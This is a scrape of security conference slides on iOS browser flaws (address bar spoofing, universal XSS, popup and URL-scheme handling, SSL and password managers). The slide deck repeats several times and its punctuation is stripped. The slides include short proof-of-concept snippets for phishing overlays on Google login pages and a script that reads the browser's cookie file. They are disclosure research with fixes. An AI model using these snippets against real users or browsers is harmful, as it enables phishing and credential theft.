Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
![Page 14: Mobile Browsers Security: iOS · UIWebView & WKWebView. JavaScript used to implement browser features and to override native functions to bridge them with Objective-C code UIWebView](https://reader033.vdocuments.mx/reader033/viewer/2022041604/5e32c88e666d781cfd776496/html5/thumbnails/14.jpg)
UIWebViewDelegate
bull webViewshouldStartLoadWithRequestnavigationType
bull webViewDidStartLoad
bull webViewDidFinishLoad
bull webViewdidFailLoadWithError
UIWebView amp WKWebView
iOS8 beta WKWebViewbull configurationpreferences
bull configurationuserContentController
bull navigationDelegate
bull UIDelegate
bull URL (KVO)
bull hasOnlySecureContent (KVO)
UIWebView amp WKWebView
Bolted-on by the browsersbull Address bar
bull Multiple tabs
bull Downloads
bull Support for untrusted SSL certificates
bull Autocomplete amp password manager
bull hellip and many more features (safety ratings malware protection cloud integration hellip)
UIWebView amp WKWebView
Testing
bull Inspiration from Browser Security Handbook
bull Retesting previous Mobile Safari bugs
bull ldquoBlack-boxrdquo testing from web perspective review of JavaScript code a bit of reversing debugging
bull Cross-browser test caseshttpsiosbrowsr-testscom
UIWebView amp WKWebView
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Address Bar Spoofing
Address Bar Spoofing
Address bar spoofing
Address Bar Spoofing
Look-alike
IDN etc
URL trackingdesynchronization
URL tracking desynchronization
bull Navigate to untracked content
bull Initiate navigation interrupt overwrite content
bull Failed navigation
bull Loading loop
bull Lots of other methods (race conditions history hellip)
bull Most of them known for over 10 years (IE Netscape)
Address Bar Spoofing
Address Bar Spoofing Untracked Content
Address Bar Spoofing
Untracked Content
Replace window content with untracked content
documentwrite andor data URIs are usually good candidates
bull w = windowopen(lsquohttpsaccountsgooglecomrsquo) setTimeout(function()wdocumentwrite() hellip)
Address Bar Spoofing
Untracked Content
bull CVE-2013-5152 Mobile Safari Address Bar Spoofingreported in iOS 511 fixed in iOS 7
Address Bar Spoofing
Address Bar Spoofing Init amp Interrupt
Address Bar Spoofing
Init amp InterruptInitialise window with target URL replace with phishing content before it loads
bull w = windowopen(lsquohttpsaccountsgooglecomrsquo) wdocumentwrite(hellip)
Optionally fall-back to native windowopen
bull delete windowopenw = windowopen(lsquohttpsaccountsgooglecomrsquo) wdocumentwrite(hellip)
Address Bar Spoofing
Address Bar Spoofing
Init amp Interruptbull CVE-2013-6895 Kaspersky Safe Browser
bull CVE-2013-6898 F-Secure Safe Browser
bull CVE-2013-6897 Dolphin Browser
bull hellip and 45 of tested browsers
bull Special guest star Google Chrome for Android CVE-2013-6642
Address Bar Spoofing
Bug Bounty-)
Address Bar Spoofing Failed Navigation
Address Bar Spoofing
Failed NavigationIncorrect URL often remains in address bar after navigation errors
bull DNS NXDOMAIN - host not found (httpslogintargettld)
bull TCP port closed (httpswwwtargettld448)
bull SSL errors (httpstargettld)
bull Display phishing page then redirect to ldquoincorrectrdquo URL
bull Mobile Safari before iOS 7 windowfocus() or windowopen()close() allowed suppressing error alerts
Address Bar Spoofing
Address Bar Spoofing Loading loop
Address Bar Spoofing
Loading loopbull HTTP request timeout in iOS browsers is usually
between 1 and 10 minutes
bull Address bar in Mobile Safari and many other iOS browsers is updated on navigation attempt even before an actual connection is made
bull Now we only need to find a target with filtered port 443
bull Or any filtered port because Mobile Safari shows only the hostname part of the URL
Address Bar Spoofing
Loading loop
bull documentwrite(Phishing page here) location = httpsaccountsgooglecom8443setInterval(function() location=httpsaccountsgooglecom8443 hellip)
Address Bar Spoofing
Address Bar Spoofing
Phishing page
Title bar
Address Bar Spoofing
lttitlegthttpswwwapplecomlttitlegt
Address bar tipsbull Display the URL that is currently loaded within
UIWebView not the one you think will be there
bull UIWebViewDelegate Update address bar on each event including webViewdidFailLoadWithError
bull Displaying SSL lock makes sense if there was an actual successful and valid SSL connection Spoofing https URL seems easy donrsquot make it worse by automatically adding SSL lock
bull iOS8 KVO-compliant WKWebViewURL property
Address Bar Spoofing
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
UXSS UniversalCross-Site Scripting
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
XSS enables attackers to inject client-side script into web pages viewed by other users
bypassing same-origin policy
In UXSS the attacker exploits vulnerability in the browser not in the website
(~ httpenwikipediaorgwikiCross-site_scripting)
Famous after PDF UXSS in 2007
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
bull CVE-2013-6893 UXSS in Mercury Browser for iOS
bull CVE-2013-7197 UXSS in YandexBrowser for iOS
bull CVE-2012-2899 UXSS in Google Chrome for iOS
bull hellip
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-6893UXSS in Mercury Browser
UXSS Universal Cross-Site Scripting
CVE-2013-6893 Mercury UXSS
w = windowopen(lsquoaboutblankrsquo)
mbexec$(WINDOW_ID)[ commandwindowopen target1234 ldquourlaboutblank ]
Mathrandom()
UXSS Universal Cross-Site Scripting
[webView loadRequest hellip ldquoaboutblankrdquo hellip]
cross-frame forgery
CVE-2013-6893 Mercury UXSS
wdocumentwrite(lsquoHirsquo)
mbexec$(WINDOW_ID)[ ldquocommandwindowdocumentwrite target1234 ldquohtmlrdquoHi ]
UXSS Universal Cross-Site Scripting
[webView stringByEvaluatingJavaScriptFromString ldquodocumentwrite(lsquoHirsquo)rdquo]
CVE-2013-6893 Mercury UXSS
Mercury Browser for iOS does not implement same-origin policy restrictions for cross-tab calls Any at all
w = windowopen(lsquohttpsaccountsgooglecom) wdocumentwrite(lsquoltscript src=hellipgtltscriptgtrsquo) hellipand it just works in accountsgooglecom
UXSS Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-7197UXSS in YandexBrowser
UXSS Universal Cross-Site Scripting
CVE-2013-7197 Yandex UXSS
bull Same-origin check implemented on windowopen()
bull Not rechecked on windowdocumentwrite()
bull Redirect child window after windowopen()
UXSS
UXSS Universal Cross-Site Scripting
Bug Bounty-)
CVE-2012-2899UXSS in Google Chrome
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(locationhref)wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURLhref]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(lsquoaboutblankrsquo)wdocumentwrite(hellip)
bull aboutblank is kind of ldquono URLrdquo right
bull [webView loadHTMLStringldquohelliprdquo baseURLnil]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull For baseURL = nilUIWebView loads applewebdata origin Same as file - no same-origin policy access to any web origin and local files
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSSbull w = windowopen(lsquoaboutblankrsquo)
wdocumentwrite( lsquoltscriptgtdocumentwrite(locationhref)ltscriptgtrsquo )
bull applewebdata origin
bull UXSS + local file access (application sandboxjailbreak)
UXSS Universal Cross-Site Scripting
Bug Bounty-)
Safe cross-tab documentwrite
bull w = windowopen(locationhref) wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURL [NSURL hellipldquoaboutblankrdquo]
UXSS Universal Cross-Site Scripting
Safe cross-tab documentwrite
bull iOS8 use WKWebViewUIDelegate webViewcreateWebViewWithConfigurationforNavigationActionwindowFeatures
UXSS Universal Cross-Site Scripting
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
![Page 15: Mobile Browsers Security: iOS · UIWebView & WKWebView. JavaScript used to implement browser features and to override native functions to bridge them with Objective-C code UIWebView](https://reader033.vdocuments.mx/reader033/viewer/2022041604/5e32c88e666d781cfd776496/html5/thumbnails/15.jpg)
iOS8 beta WKWebViewbull configurationpreferences
bull configurationuserContentController
bull navigationDelegate
bull UIDelegate
bull URL (KVO)
bull hasOnlySecureContent (KVO)
UIWebView amp WKWebView
Bolted-on by the browsersbull Address bar
bull Multiple tabs
bull Downloads
bull Support for untrusted SSL certificates
bull Autocomplete amp password manager
bull hellip and many more features (safety ratings malware protection cloud integration hellip)
UIWebView amp WKWebView
Testing
bull Inspiration from Browser Security Handbook
bull Retesting previous Mobile Safari bugs
bull ldquoBlack-boxrdquo testing from web perspective review of JavaScript code a bit of reversing debugging
bull Cross-browser test caseshttpsiosbrowsr-testscom
UIWebView amp WKWebView
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Address Bar Spoofing
Address Bar Spoofing
Address bar spoofing
Address Bar Spoofing
Look-alike
IDN etc
URL trackingdesynchronization
URL tracking desynchronization
bull Navigate to untracked content
bull Initiate navigation interrupt overwrite content
bull Failed navigation
bull Loading loop
bull Lots of other methods (race conditions history hellip)
bull Most of them known for over 10 years (IE Netscape)
Address Bar Spoofing
Address Bar Spoofing Untracked Content
Address Bar Spoofing
Untracked Content
Replace window content with untracked content
documentwrite andor data URIs are usually good candidates
bull w = windowopen(lsquohttpsaccountsgooglecomrsquo) setTimeout(function()wdocumentwrite() hellip)
Address Bar Spoofing
Untracked Content
bull CVE-2013-5152 Mobile Safari Address Bar Spoofingreported in iOS 511 fixed in iOS 7
Address Bar Spoofing
Address Bar Spoofing Init amp Interrupt
Address Bar Spoofing
Init amp InterruptInitialise window with target URL replace with phishing content before it loads
bull w = windowopen(lsquohttpsaccountsgooglecomrsquo) wdocumentwrite(hellip)
Optionally fall-back to native windowopen
bull delete windowopenw = windowopen(lsquohttpsaccountsgooglecomrsquo) wdocumentwrite(hellip)
Address Bar Spoofing
Address Bar Spoofing
Init amp Interruptbull CVE-2013-6895 Kaspersky Safe Browser
bull CVE-2013-6898 F-Secure Safe Browser
bull CVE-2013-6897 Dolphin Browser
bull hellip and 45 of tested browsers
bull Special guest star Google Chrome for Android CVE-2013-6642
Address Bar Spoofing
Bug Bounty-)
Address Bar Spoofing Failed Navigation
Address Bar Spoofing
Failed NavigationIncorrect URL often remains in address bar after navigation errors
bull DNS NXDOMAIN - host not found (httpslogintargettld)
bull TCP port closed (httpswwwtargettld448)
bull SSL errors (httpstargettld)
bull Display phishing page then redirect to ldquoincorrectrdquo URL
bull Mobile Safari before iOS 7 windowfocus() or windowopen()close() allowed suppressing error alerts
Address Bar Spoofing
Address Bar Spoofing Loading loop
Address Bar Spoofing
Loading loopbull HTTP request timeout in iOS browsers is usually
between 1 and 10 minutes
bull Address bar in Mobile Safari and many other iOS browsers is updated on navigation attempt even before an actual connection is made
bull Now we only need to find a target with filtered port 443
bull Or any filtered port because Mobile Safari shows only the hostname part of the URL
Address Bar Spoofing
Loading loop
bull documentwrite(Phishing page here) location = httpsaccountsgooglecom8443setInterval(function() location=httpsaccountsgooglecom8443 hellip)
Address Bar Spoofing
Address Bar Spoofing
Phishing page
Title bar
Address Bar Spoofing
lttitlegthttpswwwapplecomlttitlegt
Address bar tipsbull Display the URL that is currently loaded within
UIWebView not the one you think will be there
bull UIWebViewDelegate Update address bar on each event including webViewdidFailLoadWithError
bull Displaying SSL lock makes sense if there was an actual successful and valid SSL connection Spoofing https URL seems easy donrsquot make it worse by automatically adding SSL lock
bull iOS8 KVO-compliant WKWebViewURL property
Address Bar Spoofing
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
UXSS UniversalCross-Site Scripting
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
XSS enables attackers to inject client-side script into web pages viewed by other users
bypassing same-origin policy
In UXSS the attacker exploits vulnerability in the browser not in the website
(~ httpenwikipediaorgwikiCross-site_scripting)
Famous after PDF UXSS in 2007
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
bull CVE-2013-6893 UXSS in Mercury Browser for iOS
bull CVE-2013-7197 UXSS in YandexBrowser for iOS
bull CVE-2012-2899 UXSS in Google Chrome for iOS
bull hellip
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-6893UXSS in Mercury Browser
UXSS Universal Cross-Site Scripting
CVE-2013-6893 Mercury UXSS
w = windowopen(lsquoaboutblankrsquo)
mbexec$(WINDOW_ID)[ commandwindowopen target1234 ldquourlaboutblank ]
Mathrandom()
UXSS Universal Cross-Site Scripting
[webView loadRequest hellip ldquoaboutblankrdquo hellip]
cross-frame forgery
CVE-2013-6893 Mercury UXSS
wdocumentwrite(lsquoHirsquo)
mbexec$(WINDOW_ID)[ ldquocommandwindowdocumentwrite target1234 ldquohtmlrdquoHi ]
UXSS Universal Cross-Site Scripting
[webView stringByEvaluatingJavaScriptFromString ldquodocumentwrite(lsquoHirsquo)rdquo]
CVE-2013-6893 Mercury UXSS
Mercury Browser for iOS does not implement same-origin policy restrictions for cross-tab calls Any at all
w = windowopen(lsquohttpsaccountsgooglecom) wdocumentwrite(lsquoltscript src=hellipgtltscriptgtrsquo) hellipand it just works in accountsgooglecom
UXSS Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-7197UXSS in YandexBrowser
UXSS Universal Cross-Site Scripting
CVE-2013-7197 Yandex UXSS
bull Same-origin check implemented on windowopen()
bull Not rechecked on windowdocumentwrite()
bull Redirect child window after windowopen()
UXSS
UXSS Universal Cross-Site Scripting
Bug Bounty-)
CVE-2012-2899UXSS in Google Chrome
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(locationhref)wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURLhref]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(lsquoaboutblankrsquo)wdocumentwrite(hellip)
bull aboutblank is kind of ldquono URLrdquo right
bull [webView loadHTMLStringldquohelliprdquo baseURLnil]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull For baseURL = nilUIWebView loads applewebdata origin Same as file - no same-origin policy access to any web origin and local files
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSSbull w = windowopen(lsquoaboutblankrsquo)
wdocumentwrite( lsquoltscriptgtdocumentwrite(locationhref)ltscriptgtrsquo )
bull applewebdata origin
bull UXSS + local file access (application sandboxjailbreak)
UXSS Universal Cross-Site Scripting
Bug Bounty-)
Safe cross-tab documentwrite
bull w = windowopen(locationhref) wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURL [NSURL hellipldquoaboutblankrdquo]
UXSS Universal Cross-Site Scripting
Safe cross-tab documentwrite
bull iOS8 use WKWebViewUIDelegate webViewcreateWebViewWithConfigurationforNavigationActionwindowFeatures
UXSS Universal Cross-Site Scripting
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
![Page 16: Mobile Browsers Security: iOS · UIWebView & WKWebView. JavaScript used to implement browser features and to override native functions to bridge them with Objective-C code UIWebView](https://reader033.vdocuments.mx/reader033/viewer/2022041604/5e32c88e666d781cfd776496/html5/thumbnails/16.jpg)
Bolted-on by the browsersbull Address bar
bull Multiple tabs
bull Downloads
bull Support for untrusted SSL certificates
bull Autocomplete amp password manager
bull hellip and many more features (safety ratings malware protection cloud integration hellip)
UIWebView amp WKWebView
Testing
bull Inspiration from Browser Security Handbook
bull Retesting previous Mobile Safari bugs
bull ldquoBlack-boxrdquo testing from web perspective review of JavaScript code a bit of reversing debugging
bull Cross-browser test caseshttpsiosbrowsr-testscom
UIWebView amp WKWebView
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Address Bar Spoofing
Address Bar Spoofing
Address bar spoofing
Address Bar Spoofing
Look-alike
IDN etc
URL trackingdesynchronization
URL tracking desynchronization
bull Navigate to untracked content
bull Initiate navigation interrupt overwrite content
bull Failed navigation
bull Loading loop
bull Lots of other methods (race conditions history hellip)
bull Most of them known for over 10 years (IE Netscape)
Address Bar Spoofing
Address Bar Spoofing Untracked Content
Address Bar Spoofing
Untracked Content
Replace window content with untracked content
documentwrite andor data URIs are usually good candidates
bull w = windowopen(lsquohttpsaccountsgooglecomrsquo) setTimeout(function()wdocumentwrite() hellip)
Address Bar Spoofing
Untracked Content
bull CVE-2013-5152 Mobile Safari Address Bar Spoofingreported in iOS 511 fixed in iOS 7
Address Bar Spoofing
Address Bar Spoofing Init amp Interrupt
Address Bar Spoofing
Init amp InterruptInitialise window with target URL replace with phishing content before it loads
bull w = windowopen(lsquohttpsaccountsgooglecomrsquo) wdocumentwrite(hellip)
Optionally fall-back to native windowopen
bull delete windowopenw = windowopen(lsquohttpsaccountsgooglecomrsquo) wdocumentwrite(hellip)
Address Bar Spoofing
Address Bar Spoofing
Init amp Interruptbull CVE-2013-6895 Kaspersky Safe Browser
bull CVE-2013-6898 F-Secure Safe Browser
bull CVE-2013-6897 Dolphin Browser
